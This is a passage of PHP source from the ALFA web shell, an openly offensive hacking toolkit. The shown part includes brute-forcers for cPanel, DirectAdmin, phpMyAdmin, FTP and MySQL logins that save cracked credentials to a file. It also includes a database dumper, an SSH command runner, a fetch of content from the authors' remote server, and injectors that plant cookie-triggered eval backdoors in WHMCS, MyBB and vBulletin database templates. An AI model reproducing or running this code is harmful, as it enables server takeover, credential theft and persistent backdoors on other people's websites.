  2111. echo '</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$(\'importFileBtn\').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g(\'settings\',null,null,null,null,null,null,null,\'export\',\'color\')" class="button"> Export </button></center></p>';
  2112. if($_POST['alfa7']=='export'){
  2113. echo __pre();
  2114. $colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array();
  2115. $glob_colors = $GLOBALS["__ALFA_COLOR__"];
  2116. $array = array();
  2117. foreach($glob_colors as $k => $v){
  2118. if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
  2119. $v = trim($colors[$k]);
  2120. }else{
  2121. $v = trim(is_array($v)?$v["key_color"]:$v);
  2122. }
  2123. $array[$k] = $v;
  2124. }
  2125. $file = "alfa_color_config_".date('Y-m-d-h_i_s').".conf";
  2126. $config = json_encode($array, JSON_PRETTY_PRINT);
  2127. if(!@file_put_contents($file, $config)){
  2128. echo('<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">'.$config.'</textarea></center></p>');
  2129. }else{
  2130. echo('<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$file.'\', \'download\')"><font color="#0F0">Download Config</font></a></center></p></h3>');
  2131. }
  2132. }
  2133. if($_POST['alfa2']=='>>'){
  2134. echo __pre();
  2135. $colors = json_decode($_POST["alfa1"],true);
  2136. $array = "";
  2137. $is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]=="1"?true:false;
  2138. $glob_colors = $GLOBALS["__ALFA_COLOR__"];
  2139. foreach($glob_colors as $k => $v){
  2140. if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
  2141. $v = trim($colors[$k]);
  2142. }else{
  2143. $v = trim(is_array($v)?$v["key_color"]:$v);
  2144. }
  2145. $array .= '"'.trim($k).'" => "'.$v.'",';
  2146. }
  2147. @chdir($GLOBALS['home_cwd']);
  2148. $basename = @basename($_SERVER['PHP_SELF']);
  2149. $data = @file_get_contents($basename);
  2150. $color = '/\'color\'(.*?)\),/s';
  2151. if(preg_match($color,$data,$e)){
  2152. $new = "'color' => array(".$array."),";
  2153. $data = str_replace($e[0],$new,$data);
  2154. if(@file_put_contents($basename, $data)){
  2155. echo("<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>");
  2156. }else{
  2157. echo("<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>");
  2158. }
  2159. }else{
  2160. echo("<center><p><h3>[-] Error...!</h3></p></center>");
  2161. }
  2162. }
  2163. }
  2164. echo('</div>');
  2165. alfafooter();
  2166. }
  2167. function alfaplus(){
  2168. alfahead();
  2169. echo '<div class="header"><center><p><div class="txtfont_header">| Alfa + |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'plus\',null,\'news\');">| News | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'tools\')">| Tools | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'about\')">| About Us | </a></h3></center>';
  2170. if($_POST['alfa1']=='news'||$_POST['alfa1']=='tools'){
  2171. try{
  2172. $s1 = 'http://solevisible.com/'.($_POST['alfa1']=='news'?'news.php':'tools.php');
  2173. $msg = "<center><font color='red'><b><p>Can`t Connect to Remote Server ...!<br>Please Try Again Later...!</p></b></font></center>";
  2174. $news = new AlfaCURL();
  2175. if($news->Send($s1)){
  2176. $xml = $news->Send($s1);
  2177. }else{
  2178. $xml = false;
  2179. }
  2180. if($xml){
  2181. if(@simplexml_load_string($xml)){
  2182. $doc = new DOMDocument;
  2183. $doc->loadXML($xml);
  2184. $data = $doc->getElementsByTagName('data')->item(0);
  2185. $items = $data->getElementsByTagName('item');
  2186. foreach($items as $item){
  2187. $title = $item->getElementsByTagName('title')->item(0)->nodeValue;
  2188. $description = $item->getElementsByTagName('description')->item(0)->nodeValue;
  2189. $link = $item->getElementsByTagName('link')->item(0)->nodeValue;
  2190. $pubDate = $item->getElementsByTagName('pubDate')->item(0)->nodeValue;
  2191. echo(__pre()."<center><a href='$link' target='_blank'>$title</a><br>$description<br><small><font color='#FFFFFF'><b>Date: $pubDate</b></font></small></center></pre>");
  2192. }
  2193. }else{
  2194. echo($msg);
  2195. }
  2196. }else{
  2197. echo($msg);
  2198. }
  2199. }catch(Exception $e){
  2200. echo $e->getMessage();
  2201. }}elseif($_POST['alfa1']=='about'){
  2202. echo __pre()."<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br>
  2203. <b><font size='+3' color='#00A220'>&#9774; ~ PEACE ~ &#9774;</font><br><b>
  2204. <font color='#00A220'>Shell Coded By SUPERBONE X TEAM (ALFA TEaM)</font><br>
  2205. <font color='#00A220'>Contact : solevisible@gmail.com</font><br>
  2206. <font color='#00A220'>Telegram Channel: @solevisible</font><br>
  2207. <font color='#FFFFFF'>Skype : ehsan.invisible</font><br>
  2208. <font color='#FFFFFF'>Skype : sole.sad</font><br>
  2209. <font color='#FF0000'>Persian Gulf For Ever</font><br>
  2210. <font color='#FF0000'>Iranian Hackers :)</font><br>
  2211. <font color='#FF0000'>Our Friends : Mr.PERSIA , R3veC0der</font><br>
  2212. </center></pre><iframe src='tg://resolve?domain=solevisible' frameborder='0' width='0' height='0'></iframe>";
  2213. }
  2214. echo('</div>');
  2215. alfafooter();
  2216. }
  2217. function alfaDumper(){
  2218. alfahead();
  2219. echo('<div class="header">');
  2220. AlfaNum(8,9,10);
  2221. echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\"><p>";
  2222. $table = array('td1' =>
  2223. array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  2224. 'td2' =>
  2225. array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  2226. 'td3' =>
  2227. array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
  2228. 'td4' =>
  2229. array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  2230. 'td5' =>
  2231. array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50')
  2232. );
  2233. create_table($table);
  2234. echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
  2235. $username = ($_POST['alfa3']);
  2236. $password = ($_POST['alfa4']);
  2237. $dbname = ($_POST['alfa5']);
  2238. $dfile = ($_POST['alfa6']);
  2239. $host = ($_POST['alfa7']);
  2240. if(!empty($dbname)){
  2241. echo __pre();
  2242. $msg = "<center>Check this : <font color='red'>".$dfile."</font></center>";
  2243. if(@mysqli_connect($host,$username,$password,$dbname)){
  2244. if(strlen(alfaEx("mysqldump"))>0){
  2245. alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > '".addslashes($dfile)."'");
  2246. echo($msg);
  2247. }else{
  2248. __alert("Error...!");
  2249. }
  2250. }else{
  2251. echo('<center>mysqli_connect : Error!</center>');
  2252. }
  2253. }
  2254. echo('</div>');
  2255. alfafooter();
  2256. }
  2257. function Alfa_DirectAdmin_Cracker($info){
  2258. if(!$info['mysql'])
  2259. $url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';
  2260. else $url = $info['protocol'].$info['target'].'/phpmyadmin';
  2261. $curl = curl_init();
  2262. curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
  2263. curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
  2264. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
  2265. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
  2266. curl_setopt($curl, CURLOPT_HEADER,0);
  2267. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2268. curl_setopt($curl, CURLOPT_URL,$url);
  2269. curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);
  2270. if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
  2271. $result = curl_exec($curl);
  2272. $curl_errno = curl_errno($curl);
  2273. $curl_error = curl_error($curl);
  2274. if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
  2275. elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){
  2276. echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
  2277. $info['target'] = $url;
  2278. CrackerResualt($info);
  2279. }
  2280. curl_close($curl);
  2281. }
  2282. function Alfa_CP_Cracker($info){
  2283. $url = $info['protocol'].$info['target'].':'.$info['port'];
  2284. $curl = curl_init();
  2285. curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
  2286. curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
  2287. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
  2288. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
  2289. curl_setopt($curl, CURLOPT_HEADER,0);
  2290. curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
  2291. curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));
  2292. curl_setopt($curl, CURLOPT_URL, $url);
  2293. $result = curl_exec($curl);
  2294. $curl_errno = curl_errno($curl);
  2295. $curl_error = curl_error($curl);
  2296. if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
  2297. elseif(preg_match('/filemanager/i',$result)){
  2298. echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
  2299. $info['target'] = $url;
  2300. CrackerResualt($info);
  2301. }
  2302. curl_close($curl);
  2303. }
  2304. function Alfa_FTP_Cracker($info){
  2305. $url = $info['protocol'].$info['target'];
  2306. $curl = curl_init();
  2307. curl_setopt($curl, CURLOPT_URL, $url);
  2308. curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
  2309. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2310. curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");
  2311. $result = curl_exec($curl);
  2312. $curl_errno = curl_errno($curl);
  2313. $curl_error = curl_error($curl);
  2314. if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
  2315. elseif(preg_match('/(\d+):(\d+)/i',$result)){
  2316. echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
  2317. $info['target'] = $url;
  2318. CrackerResualt($info);
  2319. }
  2320. curl_close($curl);
  2321. }
  2322. function Alfa_Mysql_Cracker($info){
  2323. if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){
  2324. CrackerResualt($info);
  2325. echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
  2326. }
  2327. }
  2328. function Alfa_FTPC($info){
  2329. if($con=@ftp_connect($info['target'],$info['port'])){
  2330. if($con){
  2331. $login=@ftp_login($con,$info['username'],$info['password']);
  2332. if($login){CrackerResualt($info);}}}
  2333. @ftp_close($con);
  2334. }
  2335. function CrackerResualt($info){
  2336. $res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;
  2337. $c = @fopen($info['fcrack'],'a+');
  2338. @fwrite($c, $res);
  2339. @fclose($c);
  2340. }
  2341. function Alfa_Call_Function_Cracker($method,$info){
  2342. switch($method){case 'cp':return Alfa_CP_Cracker($info);break;case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);break;case 'ftp':return Alfa_FTP_Cracker($info);break;case 'mysql':return Alfa_Mysql_Cracker($info);break;case 'mysql':return Alfa_FTPC($info);break;}
  2343. }
  2344. function alfaCrackers(){
  2345. alfahead();
  2346. AlfaNum(9,10);
  2347. echo '<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g(\'Crackers\',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,\'start\',this.protocol.value,this.loginpanel.value);return false;"><div class="txtfont">Login Page: <select onclick="dis_input(this.value);" name="loginpanel">';
  2348. foreach(array('cp'=>'Cpanel','direct'=>'DirectAdmin','ftp'=>'FTP','phpmyadmin'=>'PhpMyAdmin[DirectAdmin]','mysql'=>'mysql_connect()','ftpc'=>'ftp_connect()') as $key=>$val)echo('<option value="'.$key.'">'.$val.'</option>');
  2349. echo '</select> Protocol: <select id="protocol" name="protocol">';
  2350. foreach(array('https://','http://','ftp://') as $val)echo('<option value="'.$val.'">'.$val.'</option>');
  2351. echo '</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">
  2352. Port: <input id="port" type="text" name="port" value="2083">
  2353. <table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>
  2354. <textarea placeholder="Users" rows="20" cols="25" name="usernames">'.($GLOBALS['sys']=='unix'?alfaEx("cut -d: -f1 /etc/passwd"):"").'</textarea>
  2355. &nbsp <textarea placeholder="Passwords" rows="20"cols="25" name="passwords"></textarea><br><br>
  2356. Save Result Into File <input type="text" name="fcrack" value="cracked.txt">
  2357. <p><input type="submit" name="cracking" value=" " /></div></form></p><center>';
  2358. $target = str_replace(array('https://','http://','ftp://'),'',$_POST['alfa1']);
  2359. $port = $_POST['alfa2'];
  2360. $usernames= $_POST['alfa3'];
  2361. $passwords = $_POST['alfa4'];
  2362. $fcrack = $_POST['alfa5'];
  2363. $cracking = $_POST['alfa6'];$protocol = $_POST['alfa7'];
  2364. $loginpanel = $_POST['alfa8'];
  2365. $p = $loginpanel == 'phpmyadmin' ? $p = true : false;
  2366. if($cracking=='start'){
  2367. echo __pre();
  2368. $exuser = explode("\n",$usernames);
  2369. $expw = explode("\n",$passwords);
  2370. foreach($exuser as $user){
  2371. foreach($expw as $pw){
  2372. $array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);
  2373. Alfa_Call_Function_Cracker($loginpanel,$array);
  2374. }
  2375. }
  2376. echo '<br><font color="red">Attack Finished...</font>';
  2377. }
  2378. echo '</div>';
  2379. alfafooter();
  2380. }
  2381. function alfassh2(){
  2382. if(function_exists('ssh2_connect')){
  2383. $_SESSION['connected']= false;
  2384. $ssh_ip = $_POST['alfa1'];
  2385. $ssh_login = $_POST['alfa2'];
  2386. $ssh_pass = $_POST['alfa3'];
  2387. $ssh_port = $_POST['alfa4'];
  2388. $ssh_command = $_POST['alfa5'];
  2389. if($alfaconnect2ssh=@ssh2_connect($ssh_ip, $ssh_port))
  2390. {
  2391. if($alfalogin=@ssh2_auth_password($alfaconnect2ssh, $ssh_login, $ssh_pass))
  2392. {
  2393. $_SESSION['connected']= true;
  2394. }
  2395. }
  2396. if($_SESSION['connected']!== true){
  2397. alfahead();
  2398. echo "<div class=header>";
  2399. echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,this.ssh_ip.value,this.ssh_login.value,this.ssh_pass.value,this.ssh_port.value); return false;'><table cellpadding='2' cellspacing='0'><tr><td><font color=\"#ffffff\"><b>IP</b></font></td><td><font color=\"#ffffff\"><b>SSH USER</b></font></td><td><font color=\"#ffffff\"><b>SSH PASS</b></font></td><td><font color=\"#ffffff\"><b>SSH PORT</b></font></td><td></td></tr><tr><td><input type=text name=ssh_ip value=''></td><td><input type=text name=ssh_login value=''></td><td><input type=text name=ssh_pass value=''></td><td><input type=text name=ssh_port value=''></td><td><input type='submit' name='submit' value=' '></td></table></form></div>";
  2400. alfafooter();
  2401. }
  2402. if($_SESSION['connected']==true){
  2403. alfahead();
  2404. echo "<div class=header>";
  2405. echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,\"".$ssh_ip."\",\"".$ssh_login."\",\"".$ssh_pass."\",\"".$ssh_port."\",this.ssh_command.value,\">>\"); return false;'><table cellpadding='2' cellspacing='0'><tr><td><input type=text name=ssh_command value=''></td><td><input type='submit' name='execute' value=' '></td></table></form><form name='ssh2' method='post' onsubmit='g(\'ssh2\',null,\'\',\'\',\'\'); return false;'><input type=submit name='destsession' value='logout'></form>";
  2406. $alfastream = ssh2_exec($alfaconnect2ssh, $ssh_command);
  2407. stream_set_blocking($alfastream,true);
  2408. $output = ssh2_fetch_stream($alfastream,SSH2_STREAM_STDIO);
  2409. if($_POST['alfa6']=='>>'){
  2410. echo '<pre class=ml1>';
  2411. ob_start();
  2412. echo stream_get_contents($output);
  2413. echo htmlspecialchars(ob_get_clean());
  2414. }
  2415. echo "</div>";
  2416. alfafooter();
  2417. }}else{
  2418. alfahead();
  2419. echo '<div class=header><p><center><b><font color="red">Server does not support SSH2</font><p></b></center></div>';
  2420. alfafooter();
  2421. }
  2422. }
  2423. function output($string){ echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$string."'>Click Here !</a></font></b></center><br><br>";}
  2424. function alfaShellInjectors(){
  2425. alfahead();
  2426. echo '<div class=header>';
  2427. AlfaNum(11);
  2428. echo '<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,\'whmcs\',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,\'mybb\')">| MyBB | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,null,\'vb\')">| vBulletin |</a></h3></center>';
  2429. $selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';
  2430. if(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){
  2431. AlfaNum();
  2432. echo __pre()."<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>".getConfigHtml('whmcs')."</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\" method='post'>";
  2433. $table = array('td1' =>
  2434. array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
  2435. 'td2' =>
  2436. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  2437. 'td3' =>
  2438. array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  2439. 'td4' =>
  2440. array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  2441. 'td5' =>
  2442. array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
  2443. );
  2444. create_table($table);
  2445. echo $selector;
  2446. echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>";
  2447. if(isset($_POST['alfa6'])) {
  2448. $dbu = $_POST['alfa6'];
  2449. $dbn = $_POST['alfa7'];
  2450. $dbp = $_POST['alfa8'];
  2451. $dbh = $_POST['alfa9'];
  2452. $path = $_POST['alfa10'];
  2453. $method = $_POST['alfa4'];
  2454. $index = "{php}".ALFA_UPLOADER.";{/php}";
  2455. $newin = str_replace("'","\'",$index);
  2456. $newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}";
  2457. if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){
  2458. if(filter_var($path,FILTER_VALIDATE_URL)){
  2459. $conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
  2460. $soleSave= mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
  2461. $soleGet = mysqli_fetch_assoc($soleSave);
  2462. $tempSave1 = $soleGet['message'];
  2463. $tempSave = str_replace("'","\'",$tempSave1);
  2464. $inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'";
  2465. $result = mysqli_query($conn,$inject) or die (mysqli_error($conn));
  2466. $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
  2467. $result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));
  2468. if(function_exists('curl_version') && $method == 'auto'){
  2469. $AlfaSole = new AlfaCURL(true);
  2470. $saveurl = $AlfaSole->Send($path."/pwreset.php");
  2471. $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
  2472. $AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
  2473. $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
  2474. $Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
  2475. __alert("shell injectet...");
  2476. $ff= 'http://'.$path."/solevisible.php";
  2477. output($ff);}else{
  2478. echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='".$path."/pwreset.php' target='_blank'>".$path."/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color='#FFFFFF'>And Go To => </font><a href='".$path."/solevisible.php' target='_blank'>".$path."/solevisible.php</a></b></center><br><br>";}}else{__alert('Path is not Valid...');}}}
  2479. }if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){
  2480. AlfaNum(1,2,3,5);
  2481. echo __pre()."<p><div class='txtfont_header'>| MyBB |</div></p><center><center>".getConfigHtml("mybb")."<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\" method=POST>
  2482. ";
  2483. $table = array('td1' =>
  2484. array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
  2485. 'td2' =>
  2486. array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'),
  2487. 'td3' =>
  2488. array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'),
  2489. 'td4' =>
  2490. array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'),
  2491. 'td5' =>
  2492. array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50')
  2493. );
  2494. create_table($table);
  2495. echo $selector;
  2496. echo "<p><input type=submit value=' '></p></form></center></center>";
  2497. if(isset($_POST['alfa6'])) {
  2498. $dbu = $_POST['alfa6'];
  2499. $dbn = $_POST['alfa7'];
  2500. $dbp = $_POST['alfa8'];
  2501. $dbh = $_POST['alfa9'];
  2502. $prefix = $_POST['alfa10'];
  2503. $method = $_POST['alfa4'];
  2504. $shellCode = "{\${".ALFA_UPLOADER."}}";
  2505. $newinshell = str_replace("'","\'",$shellCode);
  2506. if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){
  2507. $conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
  2508. $inject = "select template from {$prefix}templates where title= 'calendar'";
  2509. $result = mysqli_query($conn, $inject) or die (mysqli_error($conn));
  2510. $GetTemp = mysqli_fetch_assoc($result);
  2511. $saveDate = $GetTemp['template'];
  2512. $repsave = str_replace($shellCode,"",$saveDate);
  2513. $repsave = str_replace("'","\'",$repsave);
  2514. $createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'";
  2515. $result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));
  2516. $geturl = "select value from {$prefix}settings where name= 'bburl'";
  2517. $findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));
  2518. $rowb = mysqli_fetch_assoc($findurl);
  2519. $furl = $rowb['value'];
  2520. $realurl = parse_url($furl,PHP_URL_HOST);
  2521. $realpath = parse_url($furl,PHP_URL_PATH);
  2522. $res = false;
  2523. $AlfaCurl = new AlfaCURL();
  2524. if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){
  2525. if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
  2526. @fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");
  2527. @fputs($fsock, "HOST: $realurl\r\n");
  2528. @fputs($fsock, "Connection: close\r\n\r\n");
  2529. $check = fgets($fsock);
  2530. if(preg_match("/200 OK/i",$check)){
  2531. $repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";
  2532. $clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}
  2533. @fclose($fsock);}}elseif(function_exists('curl_version') && $method == 'auto'){
  2534. $AlfaCurl->Send($realurl.$realpath."/calendar.php");
  2535. $res = true;
  2536. }
  2537. if($res){
  2538. $ff = 'http://'.$realurl.$realpath."/solevisible.php";
  2539. output($ff);
  2540. }else{
  2541. $ff = 'http://'.$realurl.$realpath."/calendar.php";
  2542. $fff = 'http://'.$realurl.$realpath."/solevisible.php";
  2543. echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color='#FFFFFF'>And Go To => </font><a href='".$fff."' target='_blank'>".$fff."</a></b></center><br><br>";
  2544. }}}}
  2545. if(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){
  2546. AlfaNum(1,2,7,9,10);
  2547. echo __pre().'<p><div class="txtfont_header">| vbulletin |</div></p><p>'.getConfigHtml('vb').'</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">';
  2548. $table = array('td1' =>
  2549. array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
  2550. 'td2' =>
  2551. array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'),
  2552. 'td3' =>
  2553. array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'),
  2554. 'td4' =>
  2555. array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'),
  2556. 'td5' =>
  2557. array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50')
  2558. );
  2559. create_table($table);
  2560. echo $selector;
  2561. echo '<p><input type="submit" value=" " /></p></form></center>';
  2562. if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){
  2563. $method = $_POST['alfa8'];
  2564. $code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&";
  2565. $conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_error($conn));
  2566. $rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='faq'";
  2567. $recivedata = @mysqli_query($conn,$rec);
  2568. $getd = @mysqli_fetch_assoc($recivedata);
  2569. $savetoass = $getd['template'];
  2570. $code = str_replace("'","\'",$code);
  2571. $p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='faq'";
  2572. $ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));
  2573. $geturl = @mysqli_query($conn,"select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'");
  2574. $getval = @mysqli_fetch_assoc($geturl);
  2575. $saveval = $getval['value'];
  2576. $realurl = parse_url($saveval,PHP_URL_HOST);
  2577. $realpath = parse_url($saveval,PHP_URL_PATH);
  2578. $res = false;
  2579. $AlfaCurl = new AlfaCURL();
